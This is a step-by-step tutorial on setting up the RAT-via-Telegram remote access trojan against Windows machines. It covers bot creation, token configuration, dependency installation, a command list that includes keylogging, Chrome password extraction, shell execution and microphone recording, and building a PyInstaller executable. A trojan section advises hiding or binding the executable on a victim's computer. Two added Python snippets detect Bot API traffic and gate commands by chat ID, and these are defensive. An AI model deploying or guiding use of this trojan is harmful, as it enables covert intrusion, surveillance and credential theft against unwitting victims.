HOW TO USE TELEGRAM TO HACK AND CONTROL A WINDOWS 10 MACHINE

Today many of the things you interact with online are bots; even queries to web applications are often handled by them. A bot is a tool driven by commands rather than by a human user. Many companies use bots for tasks such as providing online chat support to their customers: when you open a support site, a chat box may pop up asking "Hello, how can I help you?". That is a bot. It interacts with the user and offers canned answers to resolve a problem.

That is how a bot works, but what about hackers? Could they take advantage of these tools? In this article we discuss how Telegram bots can be used to hack and control a computer.

There are many remote administration tools (RATs) on the market, but they share two common problems:

  • If you take control of a device through a trojan or other malware from hundreds of miles away, you need a Command and Control (C&C) server to send commands to the infected machine, which means hosting a server and exposing a port to the Internet
  • In many RATs the traffic between the victim's machine and the C&C server is unencrypted, so the hacker's own channel is exposed to anyone watching the network

To get around these problems, some researchers use Telegram bots as the remote administration channel, which addresses both:

  • No port forwarding or hosted server is needed to control the victim's machine. The victim's computer talks to Telegram's servers through the Bot API, and the hacker talks to the same bot from the other side
  • All traffic travels over HTTPS to api.telegram.org, which protects it against Man-in-the-Middle attacks on the wire. Note the limit of that guarantee: the bot token is the only credential, so whoever holds it controls the bot
  • Best of all, the attacker can control the victim's machine from the mobile Telegram app
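
The flip side of the "no server needed" design is that every infected host has to reach api.telegram.org itself, and an implant packaged with PyInstaller does so from an arbitrary executable name rather than from a Telegram client. The following Python is an added example for this article, not code from RAT-via-Telegram: it runs over a few constructed Sysmon-style DNS query (Event ID 22) and network connection (Event ID 3) events and reports every process image that touches the Bot API host without being a known Telegram desktop client. The key=value event format, the image allow-list and the sample lines are assumptions made for the demo.

```python
"""Flag processes that reach the Telegram Bot API without being a Telegram client.

Added example for this article (not part of RAT-via-Telegram). Input is a few
constructed Sysmon-style events, one per line, key=value separated by spaces:
EventID 22 = DNS query, EventID 3 = network connection. The allow-list of
legitimate client images is an assumption; tune it to your environment.
"""
import re
from collections import defaultdict

# Host a Bot-API based implant must talk to (the article's tool uses the Bot API).
TELEGRAM_API_HOSTS = {"api.telegram.org"}
# Constructed allow-list: process images expected to talk to Telegram.
KNOWN_TELEGRAM_CLIENTS = (r"\telegram.exe",)

# Constructed sample telemetry; not captured from a real machine.
SAMPLE_EVENTS = r"""
EventID=22 Image=C:\Users\alice\AppData\Roaming\Telegram Desktop\Telegram.exe QueryName=api.telegram.org
EventID=22 Image=C:\Users\bob\Downloads\RATAttack.exe QueryName=api.telegram.org
EventID=3 Image=C:\Users\bob\Downloads\RATAttack.exe DestinationHostname=api.telegram.org DestinationPort=443
EventID=3 Image=C:\Windows\System32\svchost.exe DestinationHostname=update.microsoft.com DestinationPort=443
EventID=22 Image=C:\Python37\python.exe QueryName=api.telegram.org
EventID=3 Image=C:\Python37\python.exe DestinationHostname=api.telegram.org DestinationPort=443
"""

# key=value pairs; the lazy value runs until the next " key=" so paths may contain spaces.
_KV = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_event(line):
    """Turn one 'k=v k=v ...' line into a dict."""
    return dict(_KV.findall(line))


def is_known_client(image):
    """True if the image path ends in an allow-listed Telegram client binary."""
    img = image.lower()
    return any(img.endswith(suffix) for suffix in KNOWN_TELEGRAM_CLIENTS)


def find_suspicious_telegram_api_use(event_text):
    """Return {image: sorted event kinds} for non-client images touching the Bot API host."""
    hits = defaultdict(set)
    for line in event_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        host = ev.get("QueryName") or ev.get("DestinationHostname")
        if host is None or host.lower() not in TELEGRAM_API_HOSTS:
            continue
        image = ev.get("Image", "")
        if is_known_client(image):
            continue
        hits[image].add("dns" if ev.get("EventID") == "22" else "net")
    return {img: sorted(kinds) for img, kinds in hits.items()}


if __name__ == "__main__":
    for image, kinds in find_suspicious_telegram_api_use(SAMPLE_EVENTS).items():
        print(f"SUSPICIOUS {image} ({', '.join(kinds)}) -> api.telegram.org")
```

In a real environment, feed it the Image and QueryName/DestinationHostname fields from your Sysmon or EDR telemetry. The check is deliberately hostname-based rather than IP-based because Telegram's address ranges change and are shared with legitimate clients; a python.exe or unknown .exe resolving api.telegram.org is the signal.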

So let's dive into the tool and see how it works.

ENVIRONMENT SPECIFICATIONS

  • Use Python 3.7. The pyHook and PyAudio wheels used below are cp37 builds, so earlier and later versions are not compatible
  • Operating system: Windows 7, 8 or 10 (recommended). No other operating system is supported
  • Only 64-bit Windows is supported
  • Make sure you have a good Internet connection

INSTALLATION STEPS

Create your own Telegram bot:

  • To create a Telegram bot, install the official Telegram app (from Google Play or another official store)
  • Open the app's search bar and type BotFather
  • In the BotFather chat, press Start and type /newbot
  • Choose a name for your bot. In this example we use test123
  • You will then be asked for a username for the bot; in the example we use rsu890_bot
  • BotFather then issues an access token for the bot (shown as "xx:xx"). Copy this token and store it somewhere safe: it is needed to configure the tool, and anyone who has it can control the bot

INSTALLING AND RUNNING THE TOOL

  • Clone the following repository: https://github.com/mvrozanti/RAT-via-Telegram.git (or download it as a ZIP and extract it)
  • Open RATAttack.py from that folder in Notepad
  • Press Ctrl + F and search for "token"
  • The script reads the token from the environment variable RVT_TOKEN (token = os.environ['RVT_TOKEN']). Either set that variable to your token before running the script, or replace the line with token = 'YOUR_TOKEN_ID', where YOUR_TOKEN_ID is the token BotFather gave you, and save the file
  • Now download two Python wheels from https://www.lfd.uci.edu/~gohlke/pythonlibs/
  • Download pyHook‑1.5.1‑cp37‑cp37m‑win_amd64.whl and the matching PyAudio cp37 / win_amd64 wheel
  • After downloading both wheels, open a command prompt and install them with:

pip install pyHook‑1.5.1‑cp37‑cp37m‑win_amd64.whl  and  pip install PyAudio‑<version>‑cp37‑cp37m‑win_amd64.whl

  • Then copy the path of the cloned repository, open a command prompt and type cd <path_of_repository>
  • Now run pip install -r requirements.txt
C:\Users\webimprints\rsu>cd C:\Users\webimprints\rsu\RAT-via-Telegram-master
C:\Users\webimprints\rsu\RAT-via-Telegram-master>pip install -r requirements.txt
Requirement already satisfied: telepot in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 1)) (12.7)
Requirement already satisfied: requests in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 2)) (2.23.0)
Requirement already satisfied: image in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 3)) (1.5.28)
Requirement already satisfied: winshell in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 4)) (0.6)
Requirement already satisfied: tendo in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 5)) (0.2.15)
Requirement already satisfied: pypiwin32 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 6)) (223)
Requirement already satisfied: pyinstaller in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 7)) (3.6)
Requirement already satisfied: psutil in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 8)) (5.7.0)
Requirement already satisfied: pillow in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 9)) (7.1.1)
Requirement already satisfied: opencv-python in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 10)) (4.2.0.34)
Requirement already satisfied: console-tools in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 11)) (0.2.1)
Requirement already satisfied: urllib3>=1.9.1 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from telepot->-r requirements.txt (line 1)) (1.25.8)
Requirement already satisfied: aiohttp>=3.0.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from telepot->-r requirements.txt (line 1)) (3.6.2)
Requirement already satisfied: certifi>=2017.4.17 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (2020.4.5.1)
Requirement already satisfied: chardet<4,>=3.0.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (3.0.4)
Requirement already satisfied: idna<3,>=2.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (2.9)
Requirement already satisfied: django in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from image->-r requirements.txt (line 3)) (3.0.5)
Requirement already satisfied: six>=1.7.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (1.14.0)
Requirement already satisfied: pbr in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (5.4.4)
Requirement already satisfied: setuptools in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (40.8.0)
Requirement already satisfied: pip in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (20.0.2)
Requirement already satisfied: pywin32>=223 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pypiwin32->-r requirements.txt (line 6)) (227)
Requirement already satisfied: pefile>=2017.8.1 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (2019.4.18)
Requirement already satisfied: pywin32-ctypes>=0.2.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (0.2.0)
Requirement already satisfied: altgraph in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (0.17)
Requirement already satisfied: numpy>=1.14.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from opencv-python->-r requirements.txt (line 10)) (1.18.2)
Requirement already satisfied: termcolor in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from console-tools->-r requirements.txt (line 11)) (1.1.0)
Requirement already satisfied: colorama in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from console-tools->-r requirements.txt (line 11)) (0.4.3)
Requirement already satisfied: yarl<2.0,>=1.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (1.4.2)
Requirement already satisfied: multidict<5.0,>=4.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (4.7.5)
Requirement already satisfied: async-timeout<4.0,>=3.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (3.0.1)
Requirement already satisfied: attrs>=17.3.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (19.3.0)
Requirement already satisfied: sqlparse>=0.2.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (0.3.1)
Requirement already satisfied: asgiref~=3.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (3.2.7)
Requirement already satisfied: pytz in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (2019.3)
Requirement already satisfied: future in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pefile>=2017.8.1->pyinstaller->-r requirements.txt (line 7)) (0.18.2)
  • The tool is now ready; run it with python RATAttack.py
  • Open Telegram on your phone, search for your bot's username (rsu890_bot in this example) and type /help in the chat

The following commands are listed:

arp - display arp table
capture_pc - screenshot PC
cmd_exec - execute shell command
cp - copy files
cd - change current directory
delete - delete a file/folder
download - download file from target
decode_all - decode ALL encoded local files
dns - display DNS Cache
encode_all - encode ALL local files
freeze_keyboard - enable keyboard freeze
unfreeze_keyboard - disable keyboard freeze
get_chrome - Get Google Chrome's login/passwords
hear - record microphone
ip_info - via ipinfo.io
keylogs - get keylogs
ls - list contents of current or specified directory
msg_box - display message box with text
mv - move files
pc_info - PC information
ping - makes sure target is up
play - plays a youtube video
proxy - opens a proxy server
pwd - show current directory
python_exec - interpret python
reboot - reboot computer
run - run a file
schedule - schedule a command to run at specific time
self_destruct - destroy all traces
shutdown - shutdown computer
tasklist - display services and processes running
to - select targets by their name
update - update executable
wallpaper - change wallpaper

Now we will use the tool against the target machine.

  • Find your bot in the Telegram app and type /pc_info to get information about the victim's machine
  • You can browse the victim's file system with /cd, for example /cd C:\Windows\system32, and then use /ls, /download, /delete and the other file commands on that directory
  • You can see the victim's DNS cache with /dns
  • If you want the target machine to obey only you, set CHAT_ID in RATAttack.py to your own chat ID so that commands from any other chat are ignored
  • Likewise you can play a YouTube video on the victim's machine with /play <VIDEO_ID>
  • You can shut down or reboot the victim's computer with /shutdown or /reboot respectively
  • Many more tasks are described in the /help output
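
To make concrete what "the Bot API connects the victim's machine to Telegram" means, and why the CHAT_ID setting matters, here is an added Python example for this article (it is not code from RAT-via-Telegram). It builds the getUpdates URL the client polls, consumes a constructed getUpdates response, advances the offset so Telegram does not redeliver the same updates, and separates commands coming from the operator's chat_id from commands sent by any other chat. Without that chat_id check, anyone who finds the bot's username can issue commands to the machine. The token, chat IDs and messages are made up.

```python
"""Consume a Telegram Bot API getUpdates response and gate commands on chat_id.

Added example for this article; not code from RAT-via-Telegram. The client
side of the design described above is a plain HTTPS GET to
https://api.telegram.org/bot<TOKEN>/getUpdates, so no listening port is needed
on either end. Telegram redelivers an update until the client asks for
?offset=<update_id + 1>, and it does NOT check who sent the message: that is
what the CHAT_ID allow-list is for. Token, chat IDs and messages are constructed.
"""
import json
import re

BOT_API = "https://api.telegram.org"
OPERATOR_CHAT_IDS = {111111111}  # constructed: the operator's own chat_id

# Constructed getUpdates payload: a command from the operator, a command from an
# unknown chat that found the bot's username, and a non-command message.
SAMPLE_UPDATES = json.dumps({
    "ok": True,
    "result": [
        {"update_id": 500, "message": {"message_id": 1, "chat": {"id": 111111111}, "text": "/pc_info"}},
        {"update_id": 501, "message": {"message_id": 2, "chat": {"id": 222222222}, "text": "/shutdown"}},
        {"update_id": 502, "message": {"message_id": 3, "chat": {"id": 111111111}, "text": "hello"}},
    ],
})

# /command[@botname] [arguments]
_CMD = re.compile(r"^/([A-Za-z_][A-Za-z0-9_]*)(?:@\w+)?(?:\s+(.*))?$")


def get_updates_url(token, offset, timeout=30):
    """URL the client polls; offset acknowledges every update below it."""
    return f"{BOT_API}/bot{token}/getUpdates?offset={offset}&timeout={timeout}"


def parse_command(text):
    """'/cmd_exec dir /b' -> ('cmd_exec', 'dir /b'); None for non-commands."""
    m = _CMD.match(text or "")
    if m is None:
        return None
    return m.group(1), (m.group(2) or "").strip()


def process_updates(raw_json, allowed_chat_ids, offset=0):
    """Return (accepted, rejected, next_offset).

    accepted/rejected are lists of (chat_id, command, args). Every update,
    including rejected ones, advances the offset so Telegram stops resending it.
    """
    payload = json.loads(raw_json)
    if not payload.get("ok"):
        raise ValueError(f"Bot API error: {payload.get('description')!r}")
    accepted, rejected = [], []
    for upd in payload["result"]:
        offset = max(offset, upd["update_id"] + 1)
        msg = upd.get("message") or {}
        chat_id = msg.get("chat", {}).get("id")
        cmd = parse_command(msg.get("text"))
        if cmd is None:
            continue  # stickers, photos, plain chatter: ignore
        (accepted if chat_id in allowed_chat_ids else rejected).append((chat_id, *cmd))
    return accepted, rejected, offset


if __name__ == "__main__":
    ok, bad, nxt = process_updates(SAMPLE_UPDATES, OPERATOR_CHAT_IDS)
    print("accepted:", ok)
    print("rejected:", bad)
    print("next poll:", get_updates_url("<TOKEN>", nxt))
```

Note that the chat_id check is authorization, not authentication: Telegram authenticates only the bot token, so anyone who obtains the token can read the same updates and send their own. Protecting the token, and revoking it with BotFather's /revoke if it leaks, is what actually keeps the channel yours.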

USING THE TOOL AS A TROJAN

This tool can also be used as a trojan. The simplest way to get malware onto someone's computer is to package it as a .exe and deliver it to the victim, so that is what we will do: build a .exe that runs every time the machine starts. To create the .exe, follow these steps:

  • Open compile.py from the downloaded folder in Notepad
  • Comment out the two lines download_and_install_lfd_uci_wheel('pyAudio') and download_and_install_lfd_uci_wheel('pyHook') by prefixing each with #, since you already installed those wheels by hand in the previous section
  • Open the terminal again and move to the RATAttack folder with cd <path_of_RATAttack>
  • Run python compile.py to install the dependencies and build the .exe
C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master>python compile.py
Now going to install dependencies and compile the rat, make sure you have prepped RATAttack.py beforehand
Press ENTER to resume
Requirement already satisfied: telepot in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 1)) (12.7)
Requirement already satisfied: requests in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 2)) (2.23.0)
Requirement already satisfied: image in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 3)) (1.5.28)
Requirement already satisfied: winshell in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 4)) (0.6)
Requirement already satisfied: tendo in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 5)) (0.2.15)
Requirement already satisfied: pypiwin32 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 6)) (223)
Requirement already satisfied: pyinstaller in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 7)) (3.6)
Requirement already satisfied: psutil in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 8)) (5.7.0)
Requirement already satisfied: pillow in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 9)) (7.1.1)
Requirement already satisfied: opencv-python in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 10)) (4.2.0.34)
Requirement already satisfied: console-tools in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 11)) (0.2.1)
Requirement already satisfied: urllib3>=1.9.1 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from telepot->-r requirements.txt (line 1)) (1.25.8)
Requirement already satisfied: aiohttp>=3.0.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from telepot->-r requirements.txt (line 1)) (3.6.2)
Requirement already satisfied: idna<3,>=2.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (2.9)
Requirement already satisfied: certifi>=2017.4.17 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (2020.4.5.1)
Requirement already satisfied: chardet<4,>=3.0.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (3.0.4)
Requirement already satisfied: django in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from image->-r requirements.txt (line 3)) (3.0.5)
Requirement already satisfied: setuptools in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (40.8.0)
Requirement already satisfied: pbr in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (5.4.4)
Requirement already satisfied: pip in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (20.0.2)
Requirement already satisfied: six>=1.7.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (1.14.0)
Requirement already satisfied: pywin32>=223 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pypiwin32->-r requirements.txt (line 6)) (227)
Requirement already satisfied: pywin32-ctypes>=0.2.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (0.2.0)
Requirement already satisfied: pefile>=2017.8.1 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (2019.4.18)
Requirement already satisfied: altgraph in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (0.17)
Requirement already satisfied: numpy>=1.14.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from opencv-python->-r requirements.txt (line 10)) (1.18.2)
Requirement already satisfied: termcolor in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from console-tools->-r requirements.txt (line 11)) (1.1.0)
Requirement already satisfied: colorama in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from console-tools->-r requirements.txt (line 11)) (0.4.3)
Requirement already satisfied: attrs>=17.3.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (19.3.0)
Requirement already satisfied: yarl<2.0,>=1.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (1.4.2)
Requirement already satisfied: async-timeout<4.0,>=3.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (3.0.1)
Requirement already satisfied: multidict<5.0,>=4.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (4.7.5)
Requirement already satisfied: pytz in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (2019.3)
Requirement already satisfied: asgiref~=3.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (3.2.7)
Requirement already satisfied: sqlparse>=0.2.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (0.3.1)
Requirement already satisfied: future in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pefile>=2017.8.1->pyinstaller->-r requirements.txt (line 7)) (0.18.2)
'upx' is not recognized as an internal or external command,
operable program or batch file.
Did the install run correctly?
Press ENTER to build
139 INFO: PyInstaller: 3.6
143 INFO: Python: 3.7.4
143 INFO: Platform: Windows-10-10.0.18362-SP0
143 INFO: wrote C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\RATAttack.spec
146 INFO: UPX is not available.
146 INFO: Removing temporary files and cleaning cache in C:\Users\webimprints\rsu\AppData\Roaming\pyinstaller
178 INFO: Extending PYTHONPATH with paths
['C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master',
'C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master']
182 INFO: checking Analysis
182 INFO: Building Analysis because Analysis-00.toc is non existent
182 INFO: Initializing module dependency graph…
189 INFO: Caching module graph hooks…
209 INFO: Analyzing base_library.zip …
8635 INFO: Caching module dependency graph…
8807 INFO: running Analysis Analysis-00.toc
8823 INFO: Adding Microsoft.Windows.Common-Controls to dependent assemblies of final executable
required by c:\users\webimprints\rsu\appdata\local\programs\python\python37\python.exe
8965 INFO: Analyzing C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\RATAttack.py
11708 INFO: Processing pre-find module path hook distutils
11708 INFO: distutils: retargeting to non-venv dir 'c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib'
14101 INFO: Processing pre-find module path hook site
14105 INFO: site: retargeting to fake-dir 'c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages\PyInstaller\fake-modules'
17175 INFO: Processing pre-safe import module hook setuptools.extern.six.moves
24228 INFO: Processing pre-safe import module hook win32com
26225 INFO: Processing pre-safe import module hook urllib3.packages.six.moves
29213 INFO: Processing module hooks…
29213 INFO: Loading module hook "hook-certifi.py"…
29213 INFO: Loading module hook "hook-cv2.py"…
29213 INFO: Loading module hook "hook-distutils.py"…
29228 INFO: Loading module hook "hook-encodings.py"…
29369 INFO: Loading module hook "hook-lib2to3.py"…
29384 INFO: Loading module hook "hook-numpy.core.py"…
29900 INFO: Loading module hook "hook-numpy.py"…
29900 INFO: Loading module hook "hook-PIL.Image.py"…
31044 INFO: Loading module hook "hook-PIL.py"…
31047 INFO: Import to be excluded not found: 'FixTk'
31051 INFO: Import to be excluded not found: 'PyQt4'
31051 INFO: Import to be excluded not found: 'PySide'
31051 INFO: Excluding import 'PyQt5'
31055 INFO: Removing import of PyQt5 from module PIL.ImageQt
31059 INFO: Excluding import 'tkinter'
31063 INFO: Removing import of tkinter from module PIL.ImageTk
31067 INFO: Loading module hook "hook-PIL.SpiderImagePlugin.py"…
31071 INFO: Import to be excluded not found: 'FixTk'
31074 INFO: Excluding import 'tkinter'
31083 INFO: Loading module hook "hook-pkg_resources.py"…
32079 INFO: Excluding import 'main'
32083 INFO: Removing import of main from module pkg_resources
32083 INFO: Loading module hook "hook-pydoc.py"…
32086 INFO: Loading module hook "hook-pythoncom.py"…
32454 INFO: Loading module hook "hook-pywintypes.py"…
32817 INFO: Loading module hook "hook-setuptools.py"…
33720 INFO: Loading module hook "hook-sqlite3.py"…
33861 INFO: Loading module hook "hook-sysconfig.py"…
33861 INFO: Loading module hook "hook-win32com.py"…
34049 INFO: Loading module hook "hook-xml.dom.domreg.py"…
34049 INFO: Loading module hook "hook-xml.etree.cElementTree.py"…
34049 INFO: Loading module hook "hook-xml.py"…
34049 INFO: Loading module hook "hook-_tkinter.py"…
34377 INFO: checking Tree
34377 INFO: Building Tree because Tree-00.toc is non existent
34377 INFO: Building Tree Tree-00.toc
34517 INFO: checking Tree
34517 INFO: Building Tree because Tree-01.toc is non existent
34517 INFO: Building Tree Tree-01.toc
34673 INFO: Looking for ctypes DLLs
34829 INFO: Analyzing run-time hooks …
34845 INFO: Including run-time hook 'pyi_rth_pkgres.py'
34845 INFO: Including run-time hook 'pyi_rth_win32comgenpy.py'
34861 INFO: Including run-time hook 'pyi_rth_multiprocessing.py'
34877 INFO: Including run-time hook 'pyi_rth_certifi.py'
34907 INFO: Looking for dynamic libraries
37430 INFO: Looking for eggs
37430 INFO: Using Python library c:\users\webimprints\rsu\appdata\local\programs\python\python37\python37.dll
37445 INFO: Found binding redirects:
[]
37461 INFO: Warnings written to C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\build\RATAttack\warn-RATAttack.txt
37804 INFO: Graph cross-reference written to C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\build\RATAttack\xref-RATAttack.html
37867 INFO: checking PYZ
37867 INFO: Building PYZ because PYZ-00.toc is non existent
37867 INFO: Building PYZ (ZlibArchive) C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\build\RATAttack\PYZ-00.pyz
40633 INFO: Building PYZ (ZlibArchive) C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\build\RATAttack\PYZ-00.pyz completed successfully.
40712 INFO: checking PKG
40712 INFO: Building PKG because PKG-00.toc is non existent
40712 INFO: Building PKG (CArchive) PKG-00.pkg
60100 INFO: Building PKG (CArchive) PKG-00.pkg completed successfully.
441806 INFO: Bootloader c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages\PyInstaller\bootloader\Windows-64bit\run.exe
441806 INFO: checking EXE
441822 INFO: Building EXE because EXE-00.toc is non existent
441837 INFO: Building EXE from EXE-00.toc
441837 INFO: Appending archive to EXE C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\dist\RATAttack.exe
442041 INFO: Building EXE from EXE-00.toc completed successfully.
Script has finished
C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master>cd C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master
  • As you can see, the build succeeded (the "'upx' is not recognized" message only means UPX is not installed, so PyInstaller skips compressing the executable). The compiled RATAttack.exe is in the dist folder and is run the same way you ran the script in the earlier steps
  • If you have access to the victim's computer for a while, you can hide this .exe and keep it running in the background, or bind it to another file and use some scripting to conceal it on the victim's machine

CONCLUSION

The whole tool is written in Python and offers a long list of functions. Its appeal over conventional RATs is that the attacker needs no infrastructure of their own and can operate the victim's system from a phone with little technical knowledge. The trade-off is that the bot token compiled into the executable is the only secret protecting the channel, and every infected machine talks to api.telegram.org, an endpoint defenders can monitor and block.